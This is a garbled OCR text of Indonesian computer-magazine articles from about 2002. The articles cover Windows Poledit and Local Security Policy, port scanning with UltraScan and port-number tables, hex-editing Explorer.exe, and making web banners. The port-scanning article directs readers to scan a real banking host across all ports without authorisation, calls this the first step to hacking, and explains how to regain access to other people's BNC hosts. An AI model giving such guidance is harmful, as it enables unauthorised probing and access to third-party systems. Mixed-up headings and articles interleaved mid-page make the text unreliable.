Editor (Poledit), komputer anda

perlu juga diamankan dari
kesalahan yang terjadi karena

ketidaksengajaan atau
ketidaktahuan pemakai, terutama

bila komputer dipakai bersama-
sama orang lain. Andreas Jiman

membahasnya untuk anda.

ernahkah terpikirkan oleh
anda bagaimana caranya PC
yang kita miliki boleh dipa-

kai oleh banyak orang tanpa perlu
khawatir terjadi apa-apa dengan
sistem yang ada (Windows) atau
konfigurasinya. Salah satunya adalah
melakukan setting di PC lokal itu
sendiri menggunakan Local Security
Policy. Sebagai contoh akan dibahas
setting pada Windows XP atau
Windows 2K Professional.

Kalau kita ingin mengubah batasan
keamanan sistem di PC kita, klik
saja Control Panel -> Adminis-

P
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ADA PENJELASAN TERSEBUT DI ATAS, anda dapat mel-
ihat bahwa ada banyak hal yang bisa anda lakukan
untuk melindungi sistem operasi Microsoft Windows

anda, dengan begitu maka kecil kemungkinan pengguna
lain dapat berbuat hal-hal yang tidak anda inginkan. Namun
sebelum anda mulai menjalankan program Poledit, anda
sebaiknya melakukan beberapa hal tersebut di bawah ini
terlebih dahulu:

1. Buat backup untuk file berikut

USER.DAT
SYSTEM.DAT

(Ke dua buah file ini terletak dalam direktori
C:\WINDOWS). Tujuannya adalah untuk mengantisipasi
jika terjadi kesalahan pada saat Anda merubah registry.

2. Letakkan program Poledit ke dalam direktori yang tidak
mudah dilihat oleh pengguna lain. Misalnya dalam direk-
tori C:\WINDOWS\SYSTEM\POLEDIT. Jika perlu, anda
dapat menyimpannya ke dalam disket khusus.

Jika kedua hal tersebut di atas sudah anda lakukan, maka
sekarang anda dapat menjalankan Poledit. Berikut ini
adalah langkah-langkah untuk mengoperasikannya:

Pengoperasian Poledit

P

Menentukan Lokasi File Template (ADMIN.ADM)
Klik file POLEDIT.EXE. Pertama kali Anda men-
jalankannya, program akan meminta anda untuk
menunjukkan lokasi file template. File template
yang akan di load Poledit adalah ADMIN.ADM.

1 2 Objek Registry (Local User dan Local Computer)
Setelah file template di-load, kemudian klik menu
File / Open Registry. Setelah itu akan terlihat dua
buah objek registry, seperti tampak pada gambar
di samping.

2

trative Tools -> Local Security
Policy seperti yang terlihat pada
gambar yang pertama.

Akan diperoleh tampilan selanjut-
nya. Jika gambar ini berbeda dengan
tampilan di komputer anda, harap
diingat bahwa screen shot ini diambil
di WindowsXP dan Windows2KProf.

Terlihat bahwa Security Setting
dibagi atas lima katagori. Untuk
Win9x agak berbeda, yakni hanya
terdapat dua policy yaitu Local
Policies dan Public Policies.

Terlihat pada screen shot ini
terdapat lima kategori:

Account Policies
Local Policies
Public Key Policies
Software Restriction Policies
IP Security Plicy on Local
Computer.

Sebelumnya pada WinNT dan Win
9x, aplikasi Local Security Setting
ini masih kurang jelas kegunaannya,
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Mencegah menjalankan regedit dan command.com
Kini anda tinggal menentukan kebijakan (policy)
apa yang ingin diimplementasikan pada sistem
operasi seperti yang dijelaskan pada kelima properti
yang terlihat pada Langkah 3. Misalnya, tidak ingin
orang lain menjalankan editor registry (REGEDIT.EXE)
dan MS-DOS prompt (COMMAND.COM) di kompu-

ter anda. Maka klik properti System →Restrictions, kemudian
aktifkan [√]Option Disable Registry editing tools dan option
Disable MS-DOS prompt. Setelah itu klik OK, lalu simpan per-
ubahan yang sudah diakukan dengan mengklik Save, atau dapat
juga melalui menu File → Save. Kini bila menjalankan program
REGEDIT.EXE melalui Start →Run, lihat apa yang terjadi. Pesan
yang sama akan terlihat seperti pada gambar di bawah ini.Arti-
nya tidak  diperkenankan menjalankan program tersebut.Dengan
cara yang sama silahkan coba properti-properti yang lain.

4

Properti yang dapat di-setting pada Local User
Jika sistem pada komputer anda hanya
dioperasikan secara individual, maka objek yang
anda pilih adalah Local User. Pada Local User
terdapat 5 buah properti yang nantinya akan anda
setting, seperti tampak pada gambar di samping.

3

mengingat pada waktu itu security
masih belum banyak dipikirkan oleh
Microsoft.

Di versi Win2K dan WinXp,
Microsoft telah banyak melakukan
perubahan.

Penjelasan langsung di aplikasinya
mempermudah user untuk langsung
mengubah security di local computer
dengan lebih detail dan spesifik.

Kalau rekan-rekan neoteker mem-
buka Kategori Account Policies, akan
nampak jelas segalanya seperti kalau
kita membuka dan bermain di
Registry Editor (regedit).

Harap berhati-hati karena
perubahan yang tidak terpikirkan
dapat mengakibatkan system error.

Account Policies menerangkan
batasan account ID yang dibuat di
local computer, dan terdiri dari

Password Policy
Account Lockout Policy.

Gambar terakhir menampakkan dua
belah bagian dari aplikasi.

Window pane sebelah kiri adalah
policy folder yang akan dimainkan
dan window pane sebelah kanan

merupakan isi dari masing-masing
policy.

Seperti terlihat pada gambar,
terdapat lima batasan (lima policy)
pada dari Password Policy, yang
masing-masing dapat diubah dengan

meng--klik kanan mouse dan
kemudian klik Properties.
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STILAH PORT NUMBER BAGI PENGGUNA Internet tentu
bukan hal yang asing lagi karena begitu sering dipakai
pada saat mengakses layanan yang ada di Internet. Mi-

salnya port 194 dipakai untuk protokol IRC, port 1080 untuk
SOCKS (proxy IRC), port 21 untuk FTP, port 80 atau 8080
untuk HTTP (WWW), port 25 untuk SMTP (E-mail), port 22
untuk SSH (Secure Shell), dan port 23 untuk Telnet. Sedang-
kan UltraScan adalah sebuah program port scanning ciptaan
Michael Marchuk. Jika tertarik, anda dapat men-download-nya
dari www.point1.com/UltraScan/UltraScan_v.1.5.EXE atau
menginstalnya dari CD NeoTek bulan ini.

Untuk melacak port number dengan menggunakan UltraScan,
yang pertama kali harus dilakukan adalah menyiapkan alamat
IP dari host yang akan dilacak. Misalnya anda akan melacak
port number berapa saja yang aktif pada host ibank.klikbca.
com, anda harus mengetahui atau me-reverse nama host
ibank.klikbca.com ke bentuk IP terlebih dahulu.

Ada dua buah cara yang paling umum untuk me-reverse
domain (hostname) menjadi IP atau dari IP menjadi domain:

1. Dengan mengetik perintah /DNS [hostname] di IRC.
Contoh: /DNS ibank.klikbca.com, hasilnya terlihat pada
gambar berikut.

2. Dengan memanfaatkan utilitas nslookup yang banyak ter-
dapat pada Web, salah satunya adalah di http://dns411.com.
Anda cukup mengetikkan nama host yang akan anda reverse
ke dalam field NSLOOKUP, klik tombol Search, kemudian
lihat hasilnya seperti tampak pada gambar di bawah ini.

Selanjutnya copy dan paste alamat IP tersebut di atas ke dalam
field TCP/IP Host Start Range dan TCP/IP Host End Range
pada program UltraScan.

Agar tidak ada port number yang terlewatkan pada saat proses
stealth probe berlangsung, dan anda memiliki kesabaran yang
cukup tinggi untuk menunggu hasilnya, maka Anda dapat
mengisi nomor port maksimal yang akan di-scan ke dalam
field Scan ports to, yakni mulai dari range port 1 − 65535.
Setelah itu klik tombol Scan, dan tunggu hasilnya.

Sebagai bahan eksperimen, cobalah reverse host shells.go-

PPort Numberort Number
Jika anda menggunakan sistem Microsoft Windows 95/97/98/2000/ME atau NT, dan menyukai hacking,
ada cara yang lebih praktis untuk melacak port number pada host komputer jauh (remote system), yaitu
dengan menggunakan perangkat lunak UltraScan. Dengan UltraScan, dijamin anda tidak akan mengalami

kegagalan saat melakukan stealth probe. Eryanto Sitorus menguraikan cara penggunaannya dilengkapi
dengan tabel port number yang lazim digunakan.

dan Cardan Cara Melaca Melacaknyaaknya

I

• Me-reverse domain (hostname) menjadi IP dari IRC.

• Me-reverse domain (hostname) menjadi IP dari Web.
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link.net, kemudian jalankan program UltraScan, anda akan
menemukan begitu banyak port number yang aktif pada host
tersebut seperti yang tampa pada gambar di bawah ini.

Anda memperoleh begitu banyak port number aktif pada host
yang berhasil anda lacak. Lalu muncul pertanyaan, “Layanan
apa saja yang memakai nomor-nomor port tersebut?”
Jawabnya ada dua, yaitu:

Kalau senang mencoba-coba sesuatu yang belum pasti (ta-
hap awal untuk menjadi seorang hacker), anda boleh mencoba
salah satu port number tersebut. Misal lewat program Telnet,
yaitu dengan mengetik IP atau host ke dalam field Host Name,
kemudian ketik nomor port yang akan anda test ke dalam field
Port, lalu klik tombol Connect. Tunggu sebentar hingga benar-
benar tersambung. Setelah itu anda akan segera mengetahui
nama layanan atau program yang menempati port number
tersebut

Baca informasi yang diperlihatkan pada tabel port number
yang disertakan pada artikel ini. Namun sebelum itu anda
perlu mengetahui sedikit informasi tentang port number:

Internet Assigned Numbers Authority (IANA) yang merupa-
kan sub dari Internet Architecture Board (IAB)—sebuah badan
koordinasi dan penasihat teknis bagi masyarakat pengguna
Internet, membagi port number ke dalam tiga jarak (range).

- Range pertama,port 0-1023,disebut Well Known Port Numbers.
- Range kedua,port 1024-49151,disebut Registered Port Numbers.
- Range ketiga, port 49152-65535, disebut Dynamic Ports atau

Private Ports.

Namun demikian, anda jangan terkecoh oleh keterangan port
number pada tabel setelah program UltraScan menampilkan
nomor-nomor port yang terlacak, karena belum tentu hasilnya
sama dengan keterangan di tabel. Oleh karena itu, anda perlu
memastikannya terlebih dahulu.
Cara paling gampang untuk mengetahui nama layanan atau
program yang menempati port number adalah dengan meng-
gunakan program IRC:
∇ Jalankan program mIRC client Anda.
∇ Pada jendela status ketik /SERVER [IP/Hostname] <port

number>.
Contoh: /SERVER 66.252.4.2 1980

∇ Kemudian lihat informasi yang muncul pada jendela status
program mIRC setelah perintah tersebut di atas anda Enter.
Hasil yang sama juga terlihat pada gambar di bawah ini.

Dari informasi di atas, dapat kita ketahui bahwa ternyata
program yang menempati nomor port 1980 adalah psyBNC
versi 2.2.1, padahal keterangan di tabel, layanan atau program
yang seharusnya menempati nomor port 1980 adalah
PearlDoc XACT.

Buat Anda yang memperoleh akses ke host BNC, EZBNC,
atau psyBNC orang lain dari hasil trade, dan sering kesal
karena tidak bisa lagi menggunakannya karena port number-
nya telah diubah oleh si pemilik (Supervisor/Admin) tanpa
memberitahu anda, maka teknik port scanning menggunakan
program UltraScan bisa anda jadikan acuan yang tepat untuk
melacak port-port number yang telah berubah itu.

• Melacak port number aktif ibank.klikbca.com menggunakan UltraScan.

• Port number yang aktif pada shells.go-link.net.

• Memasukkan IP ke dalam field hostname Telnet.

• Memeriksa program yang menempati port lewat program mIRC.

• Memeriksa program yang menempati port lewat Telnet.
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1 TCP Port Service Multiplexer (tcpmux)
2 Management Utility
3 Compression Process
5 Remote Job Entry
11 Active Users
13 Daytime
17 Quote of the Day
18 Message Send Protocol
19 Character Generator
20 File Transfer (Data)
21 File Transfer (Control)
22 SSH Remote Login Protocol
23 Telnet
24 Private Mail System
25 Simple Mail Transfer Protocol (SMTP)
29 MSG ICP
31 MSG Authentication
33 Display Support Protocol
35 Private Printer Server
37 Time
38 Route Access Protocol
39 Resource Location Protocol
42 Host Name Server
43 Who Is
45 Message Processing Module
48 Digital Audit Daemon
49 Login Host Protocol
50 Remote Mail Checking Protocol
51 IMP Logical Address Maintenance
52 XNS Time Protocol
53 Domain Name Server
57 Private Terminal Access
59 Private File Service
63 Whois++
66 Oracle SQL*NET
67 Bootstrap Protocol Server
68 Bootstrap Protocol Client
69 Trivial File Transfer
70 Gopher
71–74 Remote Job Service
75 Private Dial Out Service
79 Finger
80 World Wide Web HTTP
81 HOSTS2 Name Server
84 Common Trace Facility
87 Private Terminal Link
88 Kerberos
89 SU/MIT Telnet Gateway
92 Network Printing Protocol
93 Device Control Protocol
99 Metagram Relay
101 NIC Host Name Server
103 Genesis Point-to-Point Trans Net
105 CCSO Name Server Protocol 
105 Mailbox Name Nameserver
107 Remote Telnet Service
108 SNA Gateway Access Server
109 Post Office Protocol - Version 2
110 Post Office Protocol - Version 3
111 SUN Remote Procedure Call
112 McIDAS Data Transmission Protocol
113 Authentication Service (Ident)
114 Audio News Multicast

115 Simple File Transfer Protocol
117 UUCP Path Service
118 SQL Services
119 Network News Transfer Protocol (NNTP)
123 Network Time Protocol
125 Locus PC-Interface Net Map Server
126 Unisys Unitary Login
127 Locus PC-Interface Conn Server
129 Password Generator Protocol
130 Cisco FNATIVE
131 Cisco TNATIVE
132 Cisco SYSMAINT
133 Statistics Service
134 INGRES-NET Service
135 DCE Endpoint Resolution
136 PROFILE Naming System
137 NETBIOS Name Service
138 NETBIOS Datagram Service
139 NETBIOS Session Service
143 Internet Message Access Protocol (IMAP)
144 Universal Management Architecture (UMA)
150 SQL-NET
152 Background File Transfer Program
156 SQL Service
157 KNET/VM Command/Message Protocol
158 PCMail Server
159 NSS-Routing
160 SGMP-TRAPS
161 SNMP
162 SNMPTRAP
163 CMIP/TCP Manager
164 CMIP/TCP Agent
169 SEND
170 Network PostScript
174 MAILQ
177 X Display Manager Control Protocol
178 NextStep Window Server
179 Border Gateway Protocol
187 Application Communication Interface
189 Queued File Transport
190 Gateway Access Control Protocol
191 Prospero Directory Service
192 OSU Network Monitoring System
193 Spider Remote Monitoring Protocol
194 Internet Relay Chat Protocol
197 Directory Location Service
198 Directory Location Service Monitor
200 IBM System Resource Controller
201 AppleTalk Routing Maintenance
202 AppleTalk Name Binding
204 AppleTalk Echo
206 AppleTalk Zone Information
209 Quick Mail Transfer Protocol
213 IPX
217 dBASE Unix
218 Netix Message Posting Protocol
220 Interactive Mail Access Protocol v3
221 Berkeley rlogind with SPX Auth
222 Berkeley rshd with SPX Auth
223 Certificate Distribution Center
244 Inbusiness
245 LINK
246 Display Systems Protocol

257 Secure Electronic Transaction
258 Yak Winsock Personal Chat
259 Efficient Short Remote Operations
260 Openport
261 IIOP Name Service over TLS/SSL
280 HTTP-MGMT
281 Personal Link
282 Cable Port A/X
311 AppleShare IP WebAdmin
344 Prospero Data Access Protocol
396 Novell Netware over IP
397 Multi Protocol Trans. Net.
399 ISO Transport Class 2 Non-Control over TCP
400 Workstation Solutions
401 Uninterruptible Power Supply (UPS)
406 Interactive Mail Support Protocol
408 Prospero Resource Manager Sys. Man.
409 Prospero Resource Manager Node Man.
411 Remote MT Protocol
412 Trap Convention Port
413 Storage Management Services Protocol
414 InfoSeek
423 IBM Operations Planning and Control Start
424 IBM Operations Planning and Control Track
427 Server Location
434 MobileIP-Agent
435 MobileIP-MN
442 CVC_HOSTD
443 HTTP Protocol Over TLS/SSL
444 Simple Network Paging Protocol
445 Microsoft-DS
448 DDM-SSL
449 AS Server Mapper
451 Cray Network Semaphore Server
452 Cray SFS Config Server
453 CreativeServer
454 ContentServer
455 CreativePartnr
457 SCOHELP
458 Apple Quick Time
464 KPASSWD
469 Radio Control Protocol
470 SCX-Proxy
473 Hybrid-POP
484 Integra Software Management Environment
488 GSS-HTTP
489 Nest-Protocol
511 PassGo
512 EXEC
513 Login
514 CMD
515 Printer Spooler
517 Talk
518 NTalk
519 Unix Time
520 Router
521 RPing
525 Timeserver
526 Newdate
527 Stock IXChange
528 Customer IXChange
531 Chat
532 Readnews

533 Emergency Broadcasts
534 MegaMedia Admin
537 Networked Media Streaming Protocol
540 UUCPD
541 UUCP-rlogin
542 Commerce
546 DHCPv6 Client
547 DHCPv6 Server
550 New-Who
551 CyberCash
552 Deviceshare
554 Real Time Stream Control Protocol
556 RFS Server
560–561 Rmonitord
562 CHCMD
563 NNTP Protocol Over TLS/SSL
565 Whoami
574 FTP Software Agent System
581 Bundle Discovery Protocol
582 SCC Security
583 Philips Video-Conferencing
584 Key Server
585 IMAP4+SSL
586 Password Change
587 Submission
591 FileMaker, Inc.—HTTP Alternate
592 Eudora Set
593 HTTP RPC Ep Map
614 SSLshell
615 Internet Configuration Manager
616 SCO System Administration Server
617 SCO Desktop Administration Server
620 SCO WebServer Manager
624 Crypto Admin
631 IPP (Internet Printing Protocol)
633 Service Status update (Sterling Software)
636 LDAP Protocol Over TLS/SSL
537 Lanserver
648 Registry Registrar Protocol (RRP)
652 HELLO_PORT
660 MacOS Server Admin
677 Virtual Presence Protocol
691 MS Exchange Routing
699 Access Network
705 AgentX
709 Entrust Key Management Service Handler
710 Entrust Administration Service Handler
711 Cisco TDP
729 IBM NetView DM/6000 Server/Client
730 IBM NetView DM/6000 send/tcp
731 IBM NetView DM/6000 receive/tcp
744 Flexible License Manager
747 Fujitsu Device Control
749 Kerberos Administration
750 Kerberos Version IV
767 Phonebook
777 Multiling HTTP
989 FTP Protocol, Data, Over TLS/SSL
990 FTP Protocol, Control, Over TLS/SSL
991 Netnews Administration System
992 Telnet Protocol Over TLS/SSL
993 IMAP4 Protocol Over TLS/SSL
994/995 IRC/POP3 Protocol Over TLS/SSL

Tabel 2. Daftar beberapa Registered Port Numbers yang umum digunakan

Tabel 1. Daftar beberapa Well Known Port Numbers yang umum digunakan

1025 Network Blackjack
1036 RADAR Service Protocol
1045 Fingerprint Image Transfer Protocol
1052 Dynamic DNS Tools (DDT)
1053 Remote Assistant (RA)
1067 Installation Bootstrap Protocol Server
1068 Installation Bootstrap Protocol Client
1073 BridgeControl
1080 SOCKS
1092 Open Business Reporting Protocol
1096 Common Name Resolution Protocol
1097 Sun Cluster Manager
1102–1103 ADOBE SERVER
1110 Cluster Status Info
1112 Intelligent Communication Protocol
1114 Mini SQL
1155 Network File Access
1180 Millicent Client Proxy
1183 LL Surfup HTTP
1184 LL Surfup HTTPS
1188 HP Web Admin
1203 License Validation
1204 Log Request Listener
1215 scanSTAT 1.0
1220 QT SERVER ADMIN
1227 DNS2go
1234 Infoseek Search Agent
1243 Serialgateway
1246 Payrouter
1255 DE-Cache-Query
1256 DE-Server
1257 Shockwave 2
1258 Open Network Library
1259 Open Network Library Voice
1267 pcmlinux
1278–1279 DELL Web Admin
1283 ProductInfo
1296 DProxy
1297 SDProxy
1314 Photoscript Distributed Printing System
1333 Password Policy
1334 Writesrv
1336 Instant Service Chat
1346 Alta Analytics License Manager
1347–1348 Multi Media Conferencing

1349–1350 Registration Network Protocol
1352 Lotus Note
1363 Network DataMover Requester
1364 Network DataMover Server
1365 Network Software Associates
1366 Novell NetWare Comm Service Platform
1369 GlobalView to Unix Shell
1370 Unix Shell to GlobalView
1389 Document Manager
1390 Storage Controller
1391 Storage Access Server
1392 Print Manager
1393 Network Log Server
1394 Network Log Client
1395 PC Workstation Manager software
1397 Audio Active Mail
1398 Video Active Mail
1424 Hybrid Encryption Protocol
1426 Satellite-data Acquisition System 1
1512 Microsoft's Windows Internet Name Service
1516 Virtual Places Audio Data
1517 Virtual Places Audio Control
1518 Virtual Places Video Data
1519 Virtual Places Video Control
1520 ATM ZIP Office
1595 Radio
1612 NetBill Transaction Server
1613 NetBill Key Repository
1614 NetBill Credential Server
1615 NetBill Authorization Server
1616 NetBill Product Server
1626 Shockwave
1735 PrivateChat
1739 Webaccess
1745 Remote-Winsock
1750 Simple Socket Library's Portmaster
1942 Real Enterprise Service
1973 Data Link Switching Remote Access Protocol
1980 PearlDoc XACT
1994 Cisco Serial Tunnel Port
1995 Cisco Perf Port
1996 Cisco Remote SRB Port
1997 Cisco Gateway Discovery Protocol
1998 Cisco X.25 Service (XOT)
1999 Cisco Identification Port

2121 SCIENTIA-SSDB
2146 Live Vault Admin Event Notification
2147 Live Vault Authentication
2180 Millicent Vendor Gateway Server
2221–2223 Rockwell CSP1 - 3
2248 User Management Service
2302 Bindery Support
2303 Proxy Gateway
2311 Message Service
2346 Game Connection Port
2347 Game Announcement and Location
2348 Information to query for game status
2349 Diagnostics Port
2367 Service Control
2368 Opentable
2427 Media Gateway Control Protocol Gateway
2450 Netadmin
2451 Netchat
2452 Snifferclient
2463 Symbios Raid
2478 SecurSight Authentication Server (SSL)
2479 SecurSight Event Logging Server (SSL)
2495 Fast Remote Services
2500 Resource Tracking system server
2533 SnifferServer
2567 Cisco Line Protocol
2576 TCL Pro Debugger
2593 MNS Mail Notice Service
2594 Data Base Server
2667 Alarm Clock Server
2727 Media Gateway Control Protocol Call Agent
2764 Data Insurance
2770 Veronica
2784 World Wide Web—Development
2860–2861 Dialpad Voice 1–2
2976 CNS Server Port
2980 Instant Messaging Service
2987 Identify
3000 Remoteware Client
3001 Redwood Broker
3006 Instant Internet Admin
3007 Lotus Mail Tracking Agent Protocol
3011 Trusted Web
3012 Trusted Web Client
3014 Broker Service

3016 Notify Server
3017 Event Listener
3018 Service Registry
3031 Remote Appleevents/PPC Toolbox
3032 Redwood Chat
3044 Endpoint Protocol
3060 Interserver
3073 Very Simple Chatroom Protocol
3092 Netware Sync Services
3107 Business Protocol
3108 Geolocate Protocol
3110 Simulator Control Portocol
3111 Web Synchronous Services
3195–3196 Network Control Unit 1–2
3197–3198 Embrace Device Protocol Server 1–2
3203 Network Watcher Monitor
3204 Network Watcher DB Access
3303 OP Session Client
3304 OP Session Server
3306 MySQL
3307 OP Session Proxy
3311 MCNS Tel Ret
3312 Application Management Server
5190 America-Online
5429 Billing and Accounting System Exchange
5432 PostgreSQL Database
5435 Data Tunneling Transceiver Linking (DTTL)
5599 Enterprise Security Remote Install
5600 Enterprise Security Manager
5601 Enterprise Security Agent
5680–5712 Unassigned
5729 Openmail User Agent Layer
6150–6252 Unassigned
6583–6664 Unassigned
6665–6669 IRCU
6674–6700 Unassigned
7777 CBT
7779 VSTAT
8008 HTTP Alternate
8080 HTTP Alternate
8133–8159 Unassigned
8381–8399 Unassigned
8474–8553 Unassigned
49151 IANA Reserved
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3 MEMBUKA EXPLORER.EXE 
Bukalah file Explorer.exe yang ter-
letak di C:\ dengan memilih menu
File → Open atau dengan mene-
kan CTRL+O. File Explorer.exe akan
terbuka. File Explorer.exe siap di-
oprek.

NeoStyle

ada NeoTek Vol. II, No. 7, April
2002 kami telah menyajikan cara
mengubah tulisan Start pada

tombol ‘Start.’ Dengan menggunakan
teknik serupa, pembaca dapat pula meng-
ubah tulisan Shut Down dan Log out.
Meski cara yang paling mudah adalah
dengan bantuan tweaking tool semacam
WinBoost, namun penulis mengajak
pembaca untuk belajar mengubahnya
sendiri dengan bantuan perangkat yang
disebut hex editor.

Untuk melakukan perubahan pada tulisan
Shut Down dan Log Off pada menu Start
berarti pembaca harus melakukan modi-
fikasi pada file Explorer.exe yang terletak
di direktori Windows.

MMEENNGGGGANANTTI I 
SSHHUUT DT DOOWWN & LN & LOOG OG OFFFF
PPADADAA MMEENNU SU STTARARTT
Tulisan Shut Down dan Log Out dapat diubah dengan meng-
gunakan perangkat yang dinamakan hex editor. Happy
Chandraleka mengajak anda sedikit ‘berpetualang’ di dunia
Windows.

MENCARI LOG OFF
Selanjutnya carilah tulisan Log Off
dengan menggunakan fitur Go To
Offset. Pilihlah menu Position → Go
To Offset. Isikan dengan offset :
28172. Opsi yang lainnya sama de-
ngan Langkah 4. Tekan tombol OK
untuk berpindah ke offset tersebut.

TULISAN LOG OFF ITU
Kursor akan berpindah ke offset
28172 yang merupakan awal
tulisan Log Off yang dimaksud.
Tulisan memanjang dari offset
28172 sepanjang F h offset. Inilah
yang akan kita ganti. 

MEM-BACKUP FILE EXPLORER.EXE
Seperti biasa, buat backup file
Explorer.exe yang berada di direk-
tori Windows ke disket dan copy-
kan juga ke drive C:\ . File
Explorer.exe yang berada di drive
C:\ inilah yang akan kita utak-
utik. Jangan meng-oprek file
tersebut di direktori Windows.

MENJALANKAN WINHEX
Jalankan WinHex yang telah diins-
tal. Anda akan dihadapkan pada
jendela WinHex dengan tulisan
WinHex 9.72 di tengah layar, yang
beberapa saat kemudian akan
hilang.

1

7 8

2

Praktik mengganti ‘Shut Down’ dan ‘Log Off’ pada menu Start

MENGGANTI LOG OFF
Berpindahlah ke bagian teks di se-
belah kanan. Gantilah tulisan “& L
o g  O f f”  tersebut dengan “& K e
l u a r :” sehingga isi dalam bilang-
an hexadesimalnya adalah : 26 00
4B 00 65 00 6C 00 75 00 61 00
72 00 3A. Jangan lakukan
perubahan lain.

9

P
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MENG-UPDATE EXPLORER.EXE
Simpan perubahan-perubahan
yang anda lakukan dengan me-
milih menu File → Save atau cu-
kup dengan menekan CTRL + S.
Akan tampil kotak dialog
konfirmasi, jawablah dengan
menekan tombol Yes.

MENGGANTI FILE EXPLORER
Untuk mengganti file Explorer yang
berada di direktori Windows dengan
file Explorer yang telah dimodifi-
kasi, anda perlu masuk ke DOS
mode. Pilih Start | Shut Down dan
pilih opsi Restart in MS-Dos Mode.
Selanjutnya ketikkan perintah
copy C:\Explorer.exe C:\Windows.
Pilih Y pada konfirmasi yang ada.

MENCARI DENGAN ‘GO TO OFFSET’
Pilih menu Position → Go To
Offset atau tombol ALT+G untuk
mencari tulisan Shut Down pada
Start Menu. Isi kotak New Position
dengan 281E2, pilihan Relative to
dengan Beginning of file dan ak-
tifkan tombol Byte. Tekan OK.

TULISAN SHUT DOWN ITU
Kursor akan mengarah pada offset
281E2 yang merupakan awal offset
untuk tulisan Shut Down yang di-
maksud. Sepanjang 13h offset dari
offset ini memuat tulisan Shut
Down. Tulisan inilah yang akan kita
ganti.

4

10 11

5 MENGGANTI SHUT DOWN
Berpindahlah ke modus teks yang
terletak di sebelah kanan jendela
WinHex untuk memudahkan mo-
difikasi dan gantilah kata “S h & u t
D o w n” dengan “M a & t i k a n P
C.” Bila anda mengubah bilangan
hexadesimalnya adalah “4D 00 61
00 26 00 74 00 69 00 6B 00 61 00
6E 00 50 00 43 00.”

6

TARRA …
Akhirnya masuklah lagi ke modus
Windows dengan mengetikkan
"Exit". Apabila pembaca mela-
kukan semua langkah dengan
benar, maka tulisan Log Off dan
Shut Down telah berganti. 

12

Pada tutorial kali ini hex editor yang
kami gunakan adalah WinHex versi
9.72 yang masih merupakan versi
evaluasi dan belum teregistrasi.
WinHex sudah cukup populer di dunia
cracking dan pernah dimuat di CD
NeoTek II - 4, Januari 2002 dan di-
muat kembali di CD Neotek bulan ini.
Perangkat ini memiliki fitur/fasilitas
yang cukup banyak dan lengkap yang
diperlukan untuk membantu melaku-
kan kegiatan cracking suatu file.
Fasilitas yang dapat anda jumpai di
dalamnya antara lain adalah Go To,
Search, File Compare, Disk Editor,
Ram Editor, dll termasuk dukungan
untuk modifikasi dalam modus teks.

Fasilitas yang terakhir ini yang dapat
anda gunakan untuk memodifikasi
string (tulisan) dalam sebuah file. Dan
dengan fasilitas ini pulalah kami de-
ngan mudah dapat mengubah tulisan
Shut Down dan Log Out seperti yang
kami uraikan langkah demi langkah di
bawah ini sehingga anda akan mudah
mengikuti serta mempraktikkannya.

Keunikan lain dari  WinHex adalah
program ini mendukung enam bahasa
dunia, sehingga tidaklah terlalu
mengherankan jika program ini cukup
populer di kalangan pengguna Internet
di dunia.

Tweaking Membuat
penyesuaian atau perubah-
an kecil pada suatu sistem
elektronik atau perangkat lunak terutama
untuk meningkatkan fungsi atau mutunya
atau memperbaikinya.

Hex editor Program yang pada awalnya
pada sistem UNIX. Sebagai editor, program
ini memungkinkan pengguna melihat dan
mengedit atau menyunting file-file heksade-
simal pada ASCII. Hex editor biasanya
dilengkapi dengan fitur untuk mengubah isi
file atau mencari item tertentu pada file
tersebut.

Cracking Selain digunakan untuk men-
deskripsikan kegiatan ilegal untuk masuk ke
dalam suatu sistem komputer, crack juga
bisa berarti meng-copy perangkat lunak
komersial secara ilegal dengan membongkar
pelindung program itu dan pelindung
registrasinya.

DDAFAFTTARAR
IISSTTIILLAHAH
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3 PILIH LATAR BELAKANG
Silahkan pilih latar belakang
sesuai dengan selera anda. Anda
dapat memilih latar belakang
berupa gambar atau hanya berupa
warna. Klik Next

NeoStyle

alam membuat halama Web, kita
sebelumnya harus memikirkan
juga mengenai pembuatan banner

dan tombol-tombol yang akan ditampilkan
Web kita. Membuat banner dengan efek
dan daya tarik yang baik. Namun kini telah
ada perangkat khusus yang akan memper-
mudah anda merancang banner sesuai
dengan selera anda.

Tools ini adalah Banner Maker Pro2 yang
dikembangkan oleh GatorData, Inc.
Aplikasi ini membantu anda dalam pem-
buatan grafik untuk Web seperti banner
dan tombol yang akan menambah nilai
lebih Web anda. Banner Maker Pro2
menyediakan banyak sekali gambar untuk
latar belakang dan efek yang dapat anda

MMEEMMBBUUAAT BT BANANNNEERR
PPRROOFFEESSIIOONAL DNAL DEENNGGANAN
BBANANNNEER MAKR MAKEER PR PRRO2O2
Kini anda tidak perlu bingung dalam membuat banner atau
tombol untuk halaman Web anda. Cukup dengan  meng-
gunakan Banner Maker Pro2, anda dapat membuat banner
yang menarik dan profesional.

MEMASUKKAN TEKS
Masukkan teks ke dalam banner
anda. Ketiikan teks yang anda
inginkan di kolom sebelah tombol
New Text, dan kemudian aturlan
wana, besar, bentuk, serta posisi
hurufnya.

MEMBERI EFEK TEKS 
Pada langkah ini, anda dapat
memberikan teks anda efek 3D.
anda bisa merubah tampilan teks,
memberi warna gradient pada
teks, dan sebagainya. Silahkan
sesuaikan dengan selera anda. jika
sudah klik Next

BUKA BANNER MAKER PRO2
Jalankan program Banner Maker
Pro2 anda setelah anda meng-
instalnya. Anda akan melihat
tampilan awal program seperti
pada gambar di atas. Klik tombol
Begin

UKURAN BANNER
Pada langkah kedua, anda akan
diminta untuk menentukan
ukuran banner yang akan anda
buat. Untuk lebar dan tinggi
banner, silakan sesuaikan dengan
kebutuhan anda. Klik Next

1
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Menciptakan banner yang cantik dengan mudah.

MENYIMPAN FILE
Simpanlah pekerjaan anda dalam
format JPEG atau GIF. Anda juga
bisa melakukan Compression
untuk meminimalisasi besar file
anda. Ini merupakan langkah
terakhir jika anda membuat
Banner Static

9

D
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MEMBUAT BANNER ANIMASI
Untuk mmbuat animasi, anda
memerlukan file GIF. Untuk itu,
anda dapat menggunakan hasil
pekerjaan sebelumnya yaitu file
GIF yang telah disimpan. kini
kembalilah ke tab Text dan
masukkan teks lainnya.

SIMPAN FILE
Setelah anda memberikan efek
terhadap teks yang baru anda
masukkan, simpanlah kembali
dengan nama file yang berbeda
dalam format GIF.

TENTUKAN BORDER
Silahkan tentukan border anda,
mulai dari bentuk, efek serta
ketebalannya ada di sini semua.
Klik Next

MEMBUAT SHAPE
Shape dapat anda gunakan untuk
membuat efek 3D. Untuk mem-
buat Shape baru, anda tinggal
mengklik tombol New Shape dan
tentukan bentuk, tebal dan
warnanya. Klik Next

4
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5 MENAMBAHKAN GAMBAR
